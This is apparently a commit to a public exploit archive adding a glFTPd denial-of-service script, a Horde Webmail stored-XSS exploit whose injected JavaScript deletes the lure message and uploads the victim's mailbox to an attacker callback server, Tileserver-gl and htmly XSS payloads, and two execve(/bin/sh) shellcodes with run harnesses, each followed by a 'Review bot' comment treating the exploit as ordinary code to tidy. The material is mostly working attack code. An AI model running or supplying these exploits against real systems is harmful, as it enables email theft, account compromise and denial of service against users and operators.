DB: 2021-04-16

6 changes to exploits/shellcodes

glFTPd 2.11a - Remote Denial of Service
Horde Groupware Webmail 5.2.22 - Stored XSS
Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)

Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)
Offensive Security 2021-04-16 05:02:00 +00:00
parent bccca11e26
commit 53c15c17c6
8 changed files with 534 additions and 0 deletions

101
exploits/multiple/dos/49773.py Executable file

@ -0,0 +1,101 @@
# Exploit Title: glFTPd 2.11a - Remote Denial of Service
# Date: 15/05/2021
# Exploit Author: xynmaps
# Vendor Homepage: https://glftpd.io/
# Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz
# Version: 2.11a
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#glFTPd Denial of Service exploit by XYN/Dump/NSKB3.
"""
glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
banner = """
._________________.
| glFTPd |
| D o S |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
except OSError: pass
def main():
global target, port, start
print banner
try:
target = sys.argv[1]
except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
main()
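Review bot: The `# Date:` header reads `15/05/2021`, a month after the commit date and inconsistent with the `2021-04-15` recorded for this entry in the exploits index CSV further down in this commit; it should read `# Date: 15/04/2021`. The usage string has an unbalanced parenthesis, `<PORT(DEFAULT:21>`, and should be `usage = "{} <TARGET> <PORT(DEFAULT:21)> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])`. The file mixes Python 2 statement-form `print banner` / `print usage` with call-form prints elsewhere, so it only parses under Python 2, yet the header gives no interpreter or shebang; documenting the required interpreter would match the sibling entries in this commit that carry `#!/usr/bin/python3`. The `response` read in `test()` is never used and can be dropped.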


@ -0,0 +1,283 @@
# Exploit Title: Horde Groupware Webmail 5.2.22 - Stored XSS
# Author: Alex Birnberg
# Testing and Debugging: Ventsislav Varbanovski @nu11secur1ty
# Date: 04.14.2021
# Vendor: https://www.horde.org/apps/webmail
# Link: https://github.com/horde/webmail/releases
# CVE: CVE-2021-26929
[+] Exploit Source:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-26929
[Exploit Program Code]
#!/usr/bin/python3
# Author idea: Alex Birnberg
# debug nu11secur1ty 2021
import io
import os
import ssl
import sys
import json
import base64
import string
import random
import logging
import smtplib
import sqlite3
import hashlib
import zipfile
import argparse
from flask import Flask, request, Response
from urllib.parse import urlparse
class Exploit:
def __init__(self, args):
# Database
if not os.path.exists('database.db'):
with sqlite3.connect("database.db") as conn:
cursor = conn.cursor()
cursor.execute('CREATE TABLE mailbox (hash TEXT NOT NULL UNIQUE, content BLOB NOT NULL);')
conn.commit()
# SMTP URL
o = urlparse(args.smtp)
self.smtp = {
'ssl': o.scheme.lower() == 'smtps',
'host': o.hostname or '127.0.0.1',
'port': o.port or ('465' if o.scheme.lower() == 'smtps' else '25'),
'username': '' or o.username,
'password': '' or o.password
}
try:
if self.smtp['ssl']:
context = ssl.create_default_context()
context.verify_mode = ssl.CERT_OPTIONAL
context.check_hostname = False
self.server = smtplib.SMTP_SSL(self.smtp['host'], self.smtp['port'], context=context)
else:
self.server = smtplib.SMTP(self.smtp['host'], self.smtp['port'])
except Exception as e:
print(e)
print('[-] Error connecting to SMTP server!')
exit()
try:
self.server.login(self.smtp['username'], self.smtp['password'])
except:
pass
# Callback URL
o = urlparse(args.callback)
self.callback = {
'url': '{}://{}'.format(o.scheme, o.netloc),
'path': ''.join(random.choice(string.ascii_letters) for i in range(20))
}
# Listener URL
o = urlparse(args.listener)
self.listener = {
'ssl': o.scheme.lower() == 'https',
'host': o.hostname or '0.0.0.0',
'port': o.port or 80,
'horde': ''.join(random.choice(string.ascii_letters) for i in range(20))
}
# Target email
self.target = args.target
# Subject
self.subject = args.subject or 'Important Message'
# Environment
self.env = {}
self.env['mailbox'] = args.mailbox or 'INBOX'
self.env['callback'] = '{}/{}'.format(self.callback['url'], self.callback['path'])
def trigger(self):
print('[*] Waiting for emails...')
self.bypass_auth()
print('\n[*] Done')
def bypass_auth(self):
def horde():
f = open('horde.js')
content = 'env = {};\n\n{}'.format(json.dumps(self.env), f.read())
f.close()
return content
def callback():
response = Response('')
with sqlite3.connect("database.db") as conn:
try:
if request.files.get('mbox'):
filename = request.files.get('mbox').filename.replace('zip', 'mbox')
content = request.files.get('mbox').stream.read()
zipdata = io.BytesIO()
zipdata.write(content)
content = zipfile.ZipFile(zipdata)
content = content.open(filename).read()
mail_hash = hashlib.sha1(content).digest().hex()
print('[+] Received mailbox ({})'.format(mail_hash))
cursor = conn.cursor()
cursor.execute('INSERT INTO mailbox (hash, content) VALUES (?, ?)', (mail_hash, content))
except:
pass
response.headers['Access-Control-Allow-Origin'] = '*'
return response
payload = 'var s=document.createElement("script");s.type="text/javascript";s.src="{}/{}";document.head.append(s);'.format(self.callback['url'], self.listener['horde'])
payload = '<script>eval(atob("{}"))</script>'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1'))
content = 'Subject: {}\nFrom: {}\nTo: {}\n'.format(self.subject, self.smtp['username'], self.target)
# The secret services :)
content += 'X\x00\x00\x00{}\x00\x00\x00X'.format(base64.b64encode(payload.encode('latin-1')).decode('latin-1'))
self.server.sendmail(self.smtp['username'], self.target, content)
app = Flask(__name__)
app.add_url_rule('/{}'.format(self.listener['horde']), 'horde', horde)
app.add_url_rule('/{}'.format(self.callback['path']), 'callback', callback, methods=['POST'])
logging.getLogger('werkzeug').setLevel(logging.ERROR)
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
try:
if self.listener['ssl']:
app.run(host=self.listener['host'], port=self.listener['port'], ssl_context=('cert.pem', 'key.pem'))
else:
app.run(host=self.listener['host'], port=self.listener['port'])
except:
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--smtp', help='SMTP URL', required=True, metavar='URL')
parser.add_argument('--callback', help='Callback URL', required=True, metavar='URL')
parser.add_argument('--listener', help='Listener URL', metavar='URL')
parser.add_argument('--target', help='Target email', required=True, metavar='EMAIL')
parser.add_argument('--subject', help='Email subject', metavar='SUBJECT')
parser.add_argument('--mailbox', help='Mailbox from which to steal the emails', metavar='INBOX')
args = parser.parse_args()
exploit = Exploit(args)
exploit.trigger()
horde.js
class Exploit {
constructor() {
this.basepath = document.location.pathname.substring(0, document.location.pathname.indexOf('imp'));
}
trigger() {
this.mailbox = this.get_mailbox();
this.buid = this.get_buid();
this.token = this.get_token();
this.auto_delete()
.then(() => {
this.exfiltrate_emails({mailbox: env.mailbox});
});
}
async auto_delete() {
let params = new URLSearchParams()
params.append('token', this.token);
params.append('view', this.mailbox);
params.append('buid', this.buid);
return fetch(this.basepath + 'services/ajax.php/imp/deleteMessages', {
method: 'POST',
body: params
})
.then(() => {
let params = new URLSearchParams();
params.append('token', this.token);
params.append('view', this.mailbox);
return fetch(this.basepath + 'services/ajax.php/imp/purgeDeleted', {
method: 'POST',
body: params
})
.then(() => {
if (document.getElementById('checkmaillink') !== null) {
document.getElementById('checkmaillink').click();
}
});
});
}
async exfiltrate_emails(args) {
let mbox_list = '["' + this.get_mailbox() + '"]';
if (args.mailbox.toUpperCase() != 'INBOX') {
let params = new URLSearchParams();
params.append('reload', '1');
params.append('unsub', '1');
params.append('token', this.token);
let mailboxes = await fetch(this.basepath + 'services/ajax.php/imp/listMailboxes', {
method: 'POST',
body: params
})
.then(response => {
return response.text();
})
.then(data => {
return JSON.parse(data.substring(10, data.length - 2));
});
mailboxes.tasks['imp:mailbox'].a.forEach(mailbox => {
if (mailbox.l.toUpperCase() == args.mailbox) {
if (mbox_list === undefined) {
mbox_list = '["' + mailbox.m + '"]';
}
}
});
}
let zip = await fetch(this.basepath + 'services/download/?app=imp&actionID=download_mbox&mbox_list=' + mbox_list + '&type=mboxzip&token=' + this.token + '&fn=/')
.then(response => {
return [response.blob(), response.headers.get('Content-Disposition')];
});
let filename = zip[1];
filename = filename.substring(filename.indexOf('filename="') + 10, filename.length - 1);
zip = await zip[0];
let formData = new FormData();
formData.append('mbox', zip, filename);
fetch(window.env.callback, {
method: 'POST',
body: formData
});
}
get_token() {
let link;
let token;
if (document.getElementsByClassName('smartmobile-logout').length > 0) {
link = document.getElementsByClassName('smartmobile-logout')[0].href;
}
else if (document.getElementById('horde-logout') !== null) {
link = document.getElementById('horde-logout').getElementsByTagName('a')[0].href;
}
else {
link = location.href;
}
if (link.match('horde_logout_token=(.*)&') !== null) {
token = link.match('horde_logout_token=(.*)&')[1];
}
if (token === undefined && link.match('token=(.*)&') !== null) {
token = link.match('token=(.*)&')[1];
}
return token;
}
get_mailbox() {
if (window.DimpBase !== undefined) {
return DimpBase.viewport.getSelection(DimpBase.pp.VP_view).search({
VP_id: {
equal: [ DimpBase.pp.VP_id ]
}
}).get('dataob').first().VP_view;
}
else if (location.href.match('mailbox=([A-Za-z0-9]*)') !== null) {
return location.href.match('mailbox=([A-Za-z0-9]*)')[1];
}
else if (location.href.match('mbox=([A-Za-z0-9]*)') !== null) {
return location.href.match('mbox=([A-Za-z0-9]*)')[1];
}
}
get_buid() {
if (location.href.match('buid=([0-9]*)') !== null) {
return location.href.match('buid=([0-9]*)')[1];
}
else if (location.href.match(';([0-9]*)') !== null) {
return location.href.match(';([0-9]*)')[1];
}
}
}
const exploit = new Exploit();
exploit.trigger();
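Review bot: In `Exploit.__init__`, the SMTPS branch sets `context.verify_mode = ssl.CERT_OPTIONAL` and `context.check_hostname = False`, so the server certificate is never actually validated and the `--smtp` credentials handed to `server.login` are sent to whichever endpoint answers; `ssl.create_default_context()` already verifies by default, so the two overriding lines should be removed or the relaxation documented as intentional. `with sqlite3.connect("database.db") as conn:` (used in both `__init__` and the nested `callback`) only commits or rolls back and does not close the connection, so every callback leaks a handle; wrap it with `contextlib.closing(...)` or close explicitly. The expressions `'' or o.username` and `'' or o.password` are no-ops that evaluate to `o.username` / `o.password`, which may be `None`. Both the login attempt and the upload handler use bare `except: pass`, which hides the actual failure; catch the specific exception and log it instead.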


@ -0,0 +1,10 @@
# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
# Date: 15/04/2021
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://tileserver.org/
# Software Link: https://github.com/maptiler/tileserver-gl
# Version: versions <3.1.0
# Tested on: 2.6.0
# CVE: 2020-15500
Exploit : http://example.com/?key="><script>alert(document.domain)</script>
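Review bot: The version metadata is inconsistent: the title names 3.0.0, `# Version:` says `versions <3.1.0`, and `# Tested on:` says `2.6.0`, so a reader cannot tell whether 3.0.0 was verified or only inferred as the last affected release; stating the affected range and the tested version separately, e.g. `# Version: < 3.1.0` and `# Tested on: 2.6.0`, removes the ambiguity. The `# CVE:` line gives `2020-15500` without the `CVE-` prefix that the other entries in this commit use and that indexers key on; write `# CVE: CVE-2020-15500`.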


@ -0,0 +1,58 @@
# Exploit Title: htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)
# Authors: @nu11secur1ty & G.Dzhankushev
# Date: 04.15.2021
# Vendor Homepage: https://www.htmly.com/
# Software Link: https://github.com/danpros/htmly
# CVE: CVE-2021-30637
#!/usr/bin/python3
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
#enter the link to the website you want to automate login.
website_link="http://localhost/htmly/login"
#enter your login username
username="nu11secur1ty"
#enter your login password
password="password"
#enter the element for username input field
element_for_username="user"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="submit"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit .ini
browser.get(("http://localhost/htmly/admin/config"))
browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = '</span><img src=1 onerror=alert(1) /><span>'")
time.sleep(3)
browser.execute_script("document.querySelector('.btn.btn-primary').click()")
print("payload is deployed...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")
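Review bot: The trailing `except Exception:` discards the exception and prints only `Some error occured :(`, so a missing element, a failed login and a driver error are indistinguishable; bind and report it, `except Exception as exc:` / `print(f"Some error occurred: {exc!r}")`, which also fixes the `occured` typo. `By`, `WebDriverWait` and `EC` are imported but never used, and the `browser` created by `webdriver.Chrome()` is never closed, so a `finally: browser.quit()` is missing. For risk rating it is worth stating in the header that the stored XSS is post-authentication: the script logs in at `/htmly/login` with admin credentials before reaching `/admin/config`.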


@ -6777,6 +6777,7 @@ id,file,description,date,author,type,platform,port
49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple,
49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware,
49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -43944,3 +43945,6 @@ id,file,description,date,author,type,platform,port
49764,exploits/hardware/webapps/49764.txt,"Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE",2021-04-14,"Jay Sharma",webapps,hardware,
49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,
49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,
49769,exploits/multiple/webapps/49769.py,"Horde Groupware Webmail 5.2.22 - Stored XSS",2021-04-15,nu11secur1ty,webapps,multiple,
49771,exploits/multiple/webapps/49771.txt,"Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)",2021-04-15,"Akash Chathoth",webapps,multiple,
49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple,



@ -1032,3 +1032,5 @@ id,file,description,date,author,type,platform
49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64
49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86
49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",2021-04-15,s1ege,shellcode,linux_x86
49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",2021-04-15,s1ege,shellcode,linux_x86-64

1 id file description date author type platform
1032 49472 shellcodes/linux/49472.c Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) 2021-01-25 Guillem Alminyana shellcode linux
1033 49547 shellcodes/linux_x86-64/49547.c Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) 2021-02-09 Felipe Winsnes shellcode linux_x86-64
1034 49592 shellcodes/windows_x86/49592.asm Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) 2021-02-24 Armando Huesca Prida shellcode windows_x86
1035 49768 shellcodes/linux_x86/49768.c Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) 2021-04-15 s1ege shellcode linux_x86
1036 49770 shellcodes/linux_x86-64/49770.c Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) 2021-04-15 s1ege shellcode linux_x86-64


@ -0,0 +1,46 @@
# Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)
# Author: s1ege
# Tested on: x86_64 GNU/Linux
# Shellcode Length: 21
/*
################################################
objdump disassembly
################################################
401000: 50 push %rax
401001: 48 31 d2 xor %rdx,%rdx
401004: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
40100b: 2f 73 68
40100e: 53 push %rbx
40100f: 54 push %rsp
401010: 5f pop %rdi
401011: b0 3b mov $0x3b,%al
401013: 0f 05 syscall
################################################
################################################
shellcode.asm
################################################
; nasm -felf64 shellcode.asm && ld shellcode.o -o shellcode
section .text
global _start
_start:
push rax
xor rdx, rdx
mov rbx, 0x68732f2f6e69622f
push rbx
push rsp
pop rdi
mov al, 59
syscall
################################################
*/
unsigned char shellcode[] = \
"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int main() {
int (*ret)() = (int(*)())shellcode;
ret();
return 0;
}
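Review bot: The header asserts `Shellcode Length: 21` but the harness never checks it, whereas the sibling x86 entry in this commit prints `sizeof(code)-1`; adding `#include <stdio.h>` and `printf("Shellcode Length: %zu\n", sizeof(shellcode) - 1);` before the call keeps the two harnesses consistent and catches a truncated copy of the byte string. `int (*ret)()` declares a function pointer with an unspecified parameter list; `int (*ret)(void)` is the portable spelling. The `return 0;` after `ret();` is only reached if the call returns, which the comment block could state.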


@ -0,0 +1,30 @@
# Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
# Author: s1ege
# Tested on: i686 GNU/Linux
# Shellcode length: 17
/*
; nasm -felf32 shellcode.asm && ld -melf_i386 shellcode.o -o shellcode
section .text
global _start
_start:
push 0x0b
pop eax
push 0x0068732f
push 0x6e69622f
mov ebx, esp
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x0b\x58\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
int main() {
printf("Shellcode Length: %lu\n", sizeof(code)-1); // subtract null byte
int (*ret)() = (int(*)())code;
ret();
return 0;
}
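Review bot: `printf("Shellcode Length: %lu\n", sizeof(code)-1)` pairs `%lu` with a `size_t`; on the i686 target named in the header `size_t` is `unsigned int`, so `-Wformat` warns, and the portable specifier is `%zu`: `printf("Shellcode Length: %zu\n", sizeof(code) - 1);`. `<string.h>` is included but nothing from it is used. `int (*ret)()` should be written `int (*ret)(void)`.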